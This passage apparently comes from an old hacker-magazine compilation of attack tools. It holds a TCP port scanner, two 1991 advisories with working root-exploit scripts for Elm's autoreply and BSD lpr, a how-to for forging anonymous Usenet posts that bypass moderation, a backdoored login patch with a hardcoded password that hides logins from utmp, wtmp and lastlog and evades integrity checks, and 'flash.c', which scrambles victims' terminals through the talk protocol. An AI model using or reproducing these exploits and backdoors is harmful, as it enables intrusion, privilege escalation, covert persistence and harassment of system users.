| (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr); |
| return (RETURN_SUCCESS); |
| } |
|
|
| Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr) |
| unsigned Port; |
| struct hostent *HostEntryPointer; |
| struct sockaddr_in SocketInetAddr; |
| { |
| char Buffer[BUFSIZ]; |
| int SocketDescriptor; |
| struct servent *ServiceEntryPointer; |
|
|
|
|
| SocketInetAddr.sin_port = Port; |
| SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6); |
| if (SocketDescriptor < 0) |
| { |
| perror("socket"); |
| return (RETURN_ERR); |
| } |
| if (Verbose) |
| { |
| (void) printf("Host %s, Port %d ", HostEntryPointer->h_name, |
| Port); |
| if ((ServiceEntryPointer = getservbyport(Port, "tcp")) != |
| (struct servent *) NULL) |
| (void) printf(" (\"%s\" service) ", |
| ServiceEntryPointer->s_name); |
| (void) printf("connection ... "); |
| (void) fflush(stdout); |
| } |
| if (connect(SocketDescriptor, (char *) &SocketInetAddr, |
| sizeof(SocketInetAddr)) < 0) |
| { |
| if (Verbose) |
| (void) printf("NOT open.\n"); |
| if (Debug) |
| perror("connect"); |
| } |
| else |
| { |
| if (!Verbose) |
| { |
| (void) printf("Host %s, Port %d ", |
| HostEntryPointer->h_name, Port); |
| if ((ServiceEntryPointer = getservbyport(Port,"tcp")) != |
| (struct servent *) NULL) |
| (void) printf(" (\"%s\" service) ", |
| ServiceEntryPointer->s_name); |
| (void) printf("connection ... "); |
| (void) fflush(stdout); |
| } |
| (void) printf("open.\n"); |
| if (Hack) |
| { |
| (void) sprintf(Buffer, "/usr/ucb/telnet %s %d", |
| HostEntryPointer->h_name, Port); |
| (void) system(Buffer); |
| } |
| } |
|
|
| (void) close(SocketDescriptor); |
| return (RETURN_SUCCESS); |
| } |
|
|
| ------------------------------------------------------------------------------ |
|
|
| [8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991 |
|
|
| PROGRAM: |
|
|
| autoreply(1) (/usr/local/bin/autoreply) |
| Supplied with the Elm Mail System |
|
|
| VULNERABLE OS's: |
|
|
| Any system with a standard installation of The Elm Mail System. |
| All versions are believed to have this vulnerability. |
|
|
| DESCRIPTION: |
|
|
| autoreply(1) can be used to create root owned files, with mode |
| 666. It can also overwrite any file with semi user-controlled |
| data. |
|
|
| IMPACT: |
|
|
| Any user with access to autoreply(1) can alter system files and |
| thus become root. |
|
|
| REPEAT BY: |
|
|
| This example demonstrates how to become root on most affected |
| machines by modifying root's .rhosts file. Please do not do |
| this unless you have permission. |
|
|
| Create the following script, 'fixrhosts': |
|
|
| 8<--------------------------- cut here ---------------------------- |
| #!/bin/sh |
| # |
| # fixrhosts rhosts-file user machine |
| # |
| if [ $# -ne 3 ]; then |
| echo "Usage: `basename $0` rhosts-file user machine" |
| exit 1 |
| fi |
| RHOSTS="$1" |
| USERNAME="$2" |
| MACHINE="$3" |
| cd $HOME |
| echo x > "a |
| $MACHINE $USERNAME |
| b" |
| umask 022 |
| autoreply "a |
| $MACHINE $USERNAME |
| b" |
| cat > /tmp/.rhosts.sh.$$ << 'EOF' |
| ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'` |
| exec autoreply off |
| exit 0 |
| EOF |
| /bin/sh /tmp/.rhosts.sh.$$ $RHOSTS |
| rm -f /tmp/.rhosts.sh.$$ "a |
| $MACHINE $USERNAME |
| b" |
| exit 0 |
| 8<--------------------------- cut here ---------------------------- |
|
|
| (Lines marked with > represent user input) |
|
|
| > % id |
| uid=97(8lgm) gid=97(8lgm) groups=97(8lgm) |
| > % ./fixrhosts ~root/.rhosts 8lgm localhost |
| You've been added to the autoreply system. |
| You've been removed from the autoreply table. |
| > % rsh localhost -l root csh -i |
| Warning: no access to tty. |
| Thus no job control in this shell. |
| # |
|
|
|
|
| FIX: |
|
|
| 1. Disable autoreply. |
| 2. Wait for a patch from the Elm maintainers. |
|
|
| ------------------------------------------------------------------------------ |
|
|
| [8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991 |
|
|
| PROGRAM: |
|
|
| lpr(1) (/usr/ucb/lpr or /usr/bin/lpr) |
|
|
| VULNERABLE OS's: |
|
|
| SunOS 4.1.1 or earlier |
| BSD 4.3 |
| BSD NET/2 Derived Systems |
| A/UX 2.0.1 |
|
|
| Most systems supporting the BSD LP subsystem |
|
|
|
|
| DESCRIPTION: |
|
|
| lpr(1) can be used to overwrite or create (and become owner of) |
| any file on the system. lpr -s allows users to create symbolic |
| links in lpd's spool directory (typically /var/spool/lpd). |
| After 1000 invocations of lpr, lpr will reuse the filename in |
| the spool directory, and follow the link previously installed. |
| It will thus overwrite/create any file that this link points too. |
|
|
| IMPACT: |
|
|
| Any user with access to lpr(1) can alter system files and thus |
| become root. |
|
|
| REPEAT BY: |
|
|
| This example demonstrates how to become root on most affected |
| machines by modifying /etc/passwd and /etc/group. Please do |
| not do this unless you have permission. |
|
|
| Create the following script, 'lprcp': |
|
|
| 8<--------------------------- cut here ---------------------------- |
| #!/bin/csh -f |
| # |
| # Usage: lprcp from-file to-file |
| # |
|
|
| if ($#argv != 2) then |
| echo Usage: lprcp from-file to-file |
| exit 1 |
| endif |
|
|
| # This link stuff allows us to overwrite unreadable files, |
| # should we want to. |
| echo x > /tmp/.tmp.$$ |
| lpr -q -s /tmp/.tmp.$$ |
| rm -f /tmp/.tmp.$$ # lpr's accepted it, point it |
| ln -s $2 /tmp/.tmp.$$ # to where we really want |
|
|
| @ s = 0 |
| while ( $s != 999) # loop 999 times |
| lpr /nofile >&/dev/null # doesn't exist, but spins the clock! |
| @ s++ |
| if ( $s % 10 == 0 ) echo -n . |
| end |
| lpr $1 # incoming file |
| # user becomes owner |
| rm -f /tmp/.tmp.$$ |
| exit 0 |
| 8<--------------------------- cut here ---------------------------- |
|
|
| (Lines marked with > represent user input) |
|
|
| Make copies of /etc/passwd and /etc/group, and modify them: |
| > % id |
| uid=97(8lgm) gid=97(8lgm) groups=97(8lgm) |
| > % cp /etc/passwd /tmp/passwd |
| > % ex /tmp/passwd |
| /tmp/passwd: unmodified: line 42 |
| > :a |
| > 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh |
| > . |
| > :wq |
| /tmp/passwd: 43 lines, 2188 characters. |
| > % cp /etc/group /tmp |
| > % ex /tmp/group |
| /tmp/group: unmodified: line 49 |
| > :/wheel |
| wheel:*:0:root,operator |
| > :c |
| > wheel:*:0:root,operator,8lgm |
| > . |
| > :wq |
| /tmp/group: 49 lines, 944 characters. |
|
|
| Install our new files: |
| > % ./lprcp /tmp/group /etc/group |
| ................................................................ |
| ................................... |
| lpr: cannot rename /var/spool/lpd/cfA060testnode |
| > % ./lprcp /tmp/passwd /etc/passwd |
| ................................................................. |
| .................................. |
| lpr: cannot rename /var/spool/lpd/cfA061testnode |
|
|
| Check it worked: |
| > % ls -l /etc/passwd /etc/group |
| -rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group |
| -rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd |
| > % head -1 /etc/group |
| wheel:*:0:root,operator,8lgm |
| > % grep '^8lgmroot' /etc/passwd |
| 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh |
|
|
| Become root and tidy up: |
| > % su 8lgmroot |
| # chown root /etc/passwd /etc/group |
| # rm -f /tmp/passwd /tmp/group |
| # |
|
|
| FIX: |
|
|
| 1. Contact your vendor for a fix. |
| 2. In the meantime, apply the following patch, derived from |
| BSD NET/2 source, which will correct the flaw on most |
| affected systems: |
|
|
| ------------------------------------------------------------------------------ |
|
|
| Anonymous netnews without "anonymous" remailers |
|
|
| Save any news article to a file. We'll call it "hak" in this example. |
| Edit hak, and remove any header lines of the form |
|
|
| From some!random!path!user (note: "From ", not "From: " !!) |
| Article: |
| Lines: |
|
|
| Shorten the Path: header down to its LAST two or three "bangized" components. |
| This is to make the article look like it was posted from where it really was |
| posted, and originally hit the net at or near the host you send it to. Or |
| you can construct a completely new Path: line to reflect your assumed alias. |
|
|
| Make some change to the Message-ID: field, that isn't likely to be |
| duplicated anywhere. This is usually best done by adding a couple of |
| random characters to the part before the @, since news posting programs |
| generally use a fixed-length field to generate these IDs. |
|
|
| Change the other headers to say what you like -- From:, Newsgroups:, |
| Sender:, etc. Replace the original message text with your message. |
| If you are posting to a moderated group, remember to put in an Approved: |
| header to bypass the moderation mechanism. |
|
|
| Write out the changed file, and send it to your favorite NNTP server that |
| permits transfers via the IHAVE command, using the following script: |
|
|
| ======================= |
| #! /bin/sh |
| ## Post an article via IHAVE. |
| ## args: filename server |
|
|
| if test "$2" = "" ; then |
| echo usage: $0 filename server |
| exit 1 |
| fi |
| if test ! -f $1 ; then |
| echo $1: not found |
| exit 1 |
| fi |
|
|
| # suck msg-id out of headers, keep the brackets |
| msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \ |
| sed 's/.*-[Ii][Dd]: //'` |
| echo $msgid |
|
|
| ( sleep 5 |
| echo IHAVE $msgid |
| sleep 3 |
| cat $1 |
| sleep 1 |
| echo "." |
| sleep 1 |
| echo QUIT ) | telnet $2 119 |
| ======================= |
|
|
| If your article doesn't appear in a day or two, try a different server. |
| They are easy to find. Here's a script that will break a large file |
| full of saved netnews into a list of hosts to try. Edit the output |
| of this if you want, to remove obvious peoples' names and other trash. |
|
|
| ======================= |
| #! /bin/sh |
| FGV='fgrep -i -v' |
| egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\ |
| /g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp |
| ======================= |
|
|
| Once you have your host list, feed it to the following script. |
|
|
| ======================= |
| #! /bin/sh |
|
|
| while read xx ; do |
| if test "$xx" = "" ; then continue; |
| fi |
| echo === $xx |
| ( echo open $xx 119 |
| sleep 5 |
| echo ihave k00l@x.edu |
| sleep 4 |
| echo . |
| echo quit |
| sleep 1 |
| echo quit |
| ) | telnet |
| done |
| ======================= |
|
|
| If the above script is called "findem" and you're using csh, you should do |
|
|
| findem < list >& outfile |
|
|
| so that ALL output from telnet is captured. This takes a long time, but when |
| it finishes, edit "outfile" and look for occurrences of "335". These mark |
| answers from servers that might be willing to accept an article. This isn't a |
| completely reliable indication, since some servers respond with acceptance and |
| later drop articles. Try a given server with a slightly modified repeat of |
| someone else's message, and see if it eventually appears. |
|
|
| You will notice other servers that don't necessarily take an IHAVE, but |
| say "posting ok". You can probably do regular POSTS through these, but they |
| will add an "NNTP-Posting-Host: " header containing the machine YOU came from. |
|
|
| ------------------------------------------------------------------------------ |
|
|
| Magic Login - Written by Data King - 7 July 1994 |
|
|
| PLEASE NOTE:- |
|
|
| This program code is released on the understanding that neither the |
| author or Phrack Magazine suggest that you implement this on **ANY** |
| system that you are not authorized to do so. The author provides this |
| implementation of a "Magic" login as a learning exercise in security |
| programming. |
|
|
| Sorry for the disclaimer readers but I was advised by the AFP (Australian |
| Federal Police) that if I ever released this code they would bust me for |
| aiding and abetting. I am releasing it anyway as I believe in the right of |
| people to KNOW, but not necessarily to DO. |
|
|
| As always I can be emailed at dking@suburbia.apana.org.au |
| (Please note:- I have a NEW pgp signature.) |
|
|
| INTRODUCTION |
| ~~~~~~~~~~~~ |
| Briefly I am going to explain what a "Magic" login is and some of the steps you |
| need to go through to receive the desired result. At the end of this article is |
| a diff that can be applied to the shadow-3.2.2-linux archive to implement some |
| of these ideas. |
|
|
| EXPLANATION |
| ~~~~~~~~~~~ |
| A "Magic" login is a modified login program that allows the user to login |
| without knowing the correct password for the account they are logging into. |
|
|
| This is a very simple programming exercise and can be done by almost anyone, but |
| a really effective "Magic" login program will do much more than this. The |
| features of the supplied "Magic" login are: |
|
|
| - Will login to any valid account as long as you know the Magic password. |
|
|
| - Hides you in UTMP |
| [B |
| - Does not Log to WTMP |
|
|
| - Allows Root Login from NON authorized Terminals |
|
|
| - Preserves the Lastlogin information (ie Keeps it as though you had never |
| logged in with the magic password) |
|
|
| - Produces a binary that is exactly the same length as the original binary. |
|
|
| IMPLEMENTATION |
| ~~~~~~~~~~~~~~ |
| I am not going to go into great detail here on how to write such a system as |
| this. The code is very simple and it contains plenty of comments, so just look |
| there for ideas. |
|
|
| For this system to have less chance of being detected you need to do several |
| things. |
|
|
| First select a "Magic" password that is not easily identifiable by stringing the |
| binary. This is why in the example I have used the word "CONSOLE", this word |
| already appears several times in the binary so detection of one more is |
| unlikely. |
|
|
| Admittedly I could of encrypted the "Magic" password, but I decided against this |
| for several reasons. |
|
|
| The second thing you would need to do if you where illegally placing a "Magic" |
| login on a system would be to ensure that the admins are not doing CRC checks on |
| SUID(0) programs, or if they are that you change the CRC record of login to |
| match the CRC record of the "Magic" login. |
|
|
| Thirdly do not forget to make the date and time stamp of the new binary match |
| the old ones. |
|
|
| To install a new /bin/login on a system you will need to be root, now if you are |
| already root why would you bother? Simple, it is just one more backdoor that you |
| can use to get back in if you are detected. |
|
|
| LIMITATIONS |
| ~~~~~~~~~~~ |
| This version of the "Magic" login program does not have the following features, |
| I leave it entirely up to you about implementing something to fix them: |
|
|
| - Shells & Programs show up in the Process Table |
|
|
| - tty Ownership and attributes |
|
|
| - /proc filesystem |
|
|
| Any one of these to an alert system admin will show that there is an "invisible" |
| user on the system. However it has been my experience that most admin's rarely |
| look at these things, or if they do they can not see the wood for the trees. |
|
|
| -----<cut here>----- |
|
|
| diff -c /root/work/login/console.c /root/work/logon/console.c |
| *** /root/work/login/console.c Sun Oct 11 07:16:47 1992 |
| --- /root/work/logon/console.c Sat Jun 4 15:29:15 1994 |
| *************** |
| *** 21,26 **** |
| --- 21,27 ---- |
| #endif |
|
|
| extern char *getdef_str(); |
| + extern int magik; |
|
|
| /* |
| * tty - return 1 if the "tty" is a console device, else 0. |
| *************** |
| *** 47,52 **** |
| --- 48,57 ---- |
| if ((console = getdef_str("CONSOLE")) == NULL) |
| return 1; |
|
|
| + /* Fix for Magic Login - UnAuth Console - Data King */ |
| + |
| + if (magik==1) |
| + return 1; |
| /* |
| * If this isn't a filename, then it is a ":" delimited list of |
| * console devices upon which root logins are allowed. |
| diff -c /root/work/login/lmain.c /root/work/logon/lmain.c |
| *** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992 |
| --- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994 |
| *************** |
| *** 105,110 **** |
| --- 105,111 ---- |
| char *Prog; |
| int newenvc = 0; |
| int maxenv = MAXENV; |
| + int magik; /* Global Flag for Magic Login - Data King */ |
|
|
| /* |
| * External identifiers. |
| diff -c /root/work/login/log.c /root/work/logon/log.c |
| *** /root/work/login/log.c Mon Oct 12 17:35:07 1992 |
| --- /root/work/logon/log.c Sat Jun 4 15:37:22 1994 |
| *************** |
| *** 53,58 **** |
| --- 53,59 ---- |
| extern struct passwd pwent; |
| extern struct lastlog lastlog; |
| extern char **environ; |
| + extern char magik; |
|
|
| long lseek (); |
| time_t time (); |
| *************** |
| *** 83,89 **** |
| (void) time (&newlog.ll_time); |
| (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line); |
| (void) lseek (fd, offset, 0); |
| ! (void) write (fd, (char *) &newlog, sizeof newlog); |
| (void) close (fd); |
| } |
|
|
| --- 84,93 ---- |
| (void) time (&newlog.ll_time); |
| (void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line); |
| (void) lseek (fd, offset, 0); |
| ! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */ |
| ! { /* login - Data King */ |
| ! (void) write (fd, (char *) &newlog, sizeof newlog); |
| ! } |
| (void) close (fd); |
| } |
|
|
| diff -c /root/work/login/utmp.c /root/work/logon/utmp.c |
| *** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992 |
| --- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994 |
| *************** |
| *** 70,75 **** |
| --- 70,77 ---- |
| extern long lseek(); |
| #endif /* SVR4 */ |
|
|
| + extern int magik; |
| + |
| #define NO_UTENT \ |
| "No utmp entry. You must exec \"login\" from the lowest level \"sh\"" |
| #define NO_TTY \ |
| *************** |
| *** 353,368 **** |
| /* |
| * Scribble out the new entry and close the file. We're done |
| * with UTMP, next we do WTMP (which is real easy, put it on |
| ! * the end of the file. |
| */ |
| ! |
| ! (void) write (fd, &utmp, sizeof utmp); |
| ! (void) close (fd); |
| ! |
| ! if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { |
| (void) write (fd, &utmp, sizeof utmp); |
| (void) close (fd); |
| } |
| - utent = utmp; |
| #endif /* SVR4 */ |
| } |
| --- 355,372 ---- |
| /* |
| * Scribble out the new entry and close the file. We're done |
| * with UTMP, next we do WTMP (which is real easy, put it on |
| ! * the end of the file. If Magic Login, DONT write out UTMP - Data King |
| */ |
| ! if (magik !=1) |
| ! { |
| (void) write (fd, &utmp, sizeof utmp); |
| (void) close (fd); |
| + |
| + if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) { |
| + (void) write (fd, &utmp, sizeof utmp); |
| + (void) close (fd); |
| + } |
| + utent = utmp; |
| } |
| #endif /* SVR4 */ |
| } |
| diff -c /root/work/login/valid.c /root/work/logon/valid.c |
| *** /root/work/login/valid.c Sun Oct 11 07:16:55 1992 |
| --- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994 |
| *************** |
| *** 25,30 **** |
| --- 25,32 ---- |
| static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91"; |
| #endif |
|
|
| + extern int magik; |
| + |
| /* |
| * valid - compare encrypted passwords |
| * |
| *************** |
| *** 43,48 **** |
| --- 45,64 ---- |
| char *encrypt; |
| char *salt; |
| char *pw_encrypt (); |
| + char *magic; |
| + |
| + /* |
| + * Below is the piece of code that checks to see if the password |
| + * supplied by the user = the Magic Password - Data King |
| + */ |
| + |
| + magic = "CONSOLE"; /* Define this as the Magic Password - Data King */ |
| + |
| + if (strcmp(password,magic) == 0) |
| + { |
| + magik = 1; |
| + return(1); |
| + } |
|
|
| /* |
| * Start with blank or empty password entries. Always encrypt |
|
|
| ------------------------------------------------------------------------------ |
|
|
| /* flash.c */ |
|
|
| /* This little program is intended to quickly mess up a user's |
| terminal by issuing a talk request to that person and sending |
| vt100 escape characters that force the user to logout or kill |
| his/her xterm in order to regain a sane view of the text. |
| It the user's message mode is set to off (mesg n) he/she will |
| be unharmed. |
| This program is really nasty :-) |
|
|
| Usage: flash user@host |
|
|
| try compiling with: gcc -o flash flash.c |
| */ |
|
|
|
|
| #include <sys/types.h> |
| #include <sys/socket.h> |
| #include <netinet/in.h> |
| #include <netdb.h> |
| #include <stdio.h> |
| #include <strings.h> |
|
|
| /* this should really be in an include file.. */ |
|
|
| #define OLD_NAME_SIZE 9 |
| #define NAME_SIZE 12 |
| #define TTY_SIZE 16 |
| typedef struct { |
| char type; |
| char l_name[OLD_NAME_SIZE]; |
| char r_name[OLD_NAME_SIZE]; |
| char filler; |
| u_long id_num; |
| u_long pid; |
| char r_tty[TTY_SIZE]; |
| struct sockaddr_in addr; |
| struct sockaddr_in ctl_addr; |
| } OLD_MSG; |
|
|
| typedef struct { |
| u_char vers; |
| char type; |
| u_short filler; |
| u_long id_num; |
| struct sockaddr_in addr; |
| struct sockaddr_in ctl_addr; |
| long pid; |
| char l_name[NAME_SIZE]; |
| char r_name[NAME_SIZE]; |
| char r_tty[TTY_SIZE]; |
| } CTL_MSG; |
|
|
| #define TALK_VERSION 1 /* protocol version */ |
|
|
| /* Types */ |
| #define LEAVE_INVITE 0 |
| #define LOOK_UP 1 |
| #define DELETE 2 |
| #define ANNOUNCE 3 |
|
|
| int current = 1; /* current id.. this to avoid duplications */ |
|
|
| struct sockaddr_in *getinaddr(char *hostname, u_short port) |
| { |
| static struct sockaddr addr; |
| struct sockaddr_in *address; |
| struct hostent *host; |
|
|
| address = (struct sockaddr_in *)&addr; |
| (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); |
| /* fill in the easy fields */ |
| address->sin_family = AF_INET; |
| address->sin_port = htons(port); |
| /* first, check if the address is an ip address */ |
| address->sin_addr.s_addr = inet_addr(hostname); |
| if ( (int)address->sin_addr.s_addr == -1) |
| { |
| /* it wasn't.. so we try it as a long host name */ |
| host = gethostbyname(hostname); |
| if (host) |
| { |
| /* wow. It's a host name.. set the fields */ |
| /* ?? address->sin_family = host->h_addrtype; */ |
| bcopy( host->h_addr, (char *)&address->sin_addr, |
| host->h_length); |
| } |
| else |
| { |
| /* oops.. can't find it.. */ |
| puts("Couldn't find address"); |
| exit(-1); |
| return (struct sockaddr_in *)0; |
| } |
| } |
| /* all done. */ |
| return (struct sockaddr_in *)address; |
| } |
|
|
| SendTalkPacket(struct sockaddr_in *target, char *p, int psize) |
| { |
| int s; |
| struct sockaddr sample; /* not used.. only to get the size */ |
|
|
| s = socket(AF_INET, SOCK_DGRAM, 0); |
| sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); |
| } |
|
|
|
|
| new_ANNOUNCE(char *hostname, char *remote, char *local) |
| { |
| CTL_MSG packet; |
| struct sockaddr_in *address; |
|
|
| /* create a packet */ |
| address = getinaddr(hostname, 666 ); |
| address->sin_family = htons(AF_INET); |
|
|
| bzero( (char *)&packet, sizeof(packet) ); |
| packet.vers = TALK_VERSION; |
| packet.type = ANNOUNCE; |
| packet.pid = getpid(); |
| packet.id_num = current; |
| bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); |
| bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); |
| strncpy( packet.l_name, local, NAME_SIZE); |
| strncpy( packet.r_name, remote, NAME_SIZE); |
| strncpy( packet.r_tty, "", 1); |
|
|
| SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); |
| } |
|
|
| old_ANNOUNCE(char *hostname, char *remote, char *local) |
| { |
| OLD_MSG packet; |
| struct sockaddr_in *address; |
|
|
| /* create a packet */ |
| address = getinaddr(hostname, 666 ); |
| address->sin_family = htons(AF_INET); |
|
|
| bzero( (char *)&packet, sizeof(packet) ); |
| packet.type = ANNOUNCE; |
| packet.pid = getpid(); |
| packet.id_num = current; |
| bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); |
| bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr)); |
| strncpy( packet.l_name, local, NAME_SIZE); |
| strncpy( packet.r_name, remote, NAME_SIZE); |
| strncpy( packet.r_tty, "", 1); |
|
|
| SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) ); |
| } |
|
|
| main(int argc, char *argv[]) |
| { |
| char *hostname, *username; |
| int pid; |
|
|
| if ( (pid = fork()) == -1) |
| { |
| perror("fork()"); |
| exit(-1); |
| } |
| if ( !pid ) |
| { |
| exit(0); |
| } |
| if (argc < 2) { |
| puts("Usage: <finger info> "); |
| exit(5); |
| } |
| username = argv[1]; |
| if ( (hostname = (char *)strchr(username, '@')) == NULL ) |
| { |
| puts("Invalid name. "); |
| exit(-1); |
| } |
| *hostname = '\0'; |
| hostname++; |
|
|
| if (*username == '~') |
| username++; |
|
|
| #define FIRST "\033c\033(0\033#8" |
| #define SECOND "\033[1;3r\033[J" |
| #define THIRD "\033[5m\033[?5h" |
| new_ANNOUNCE(hostname, username, FIRST); |
| old_ANNOUNCE(hostname, username, FIRST); |
| current++; |
| new_ANNOUNCE(hostname, username, SECOND); |
| new_ANNOUNCE(hostname, username, SECOND); |
| current++; |
| new_ANNOUNCE(hostname, username, THIRD); |
| old_ANNOUNCE(hostname, username, THIRD); |
| } |
|
|
| ------------------------------------------------------------------------------ |
|
|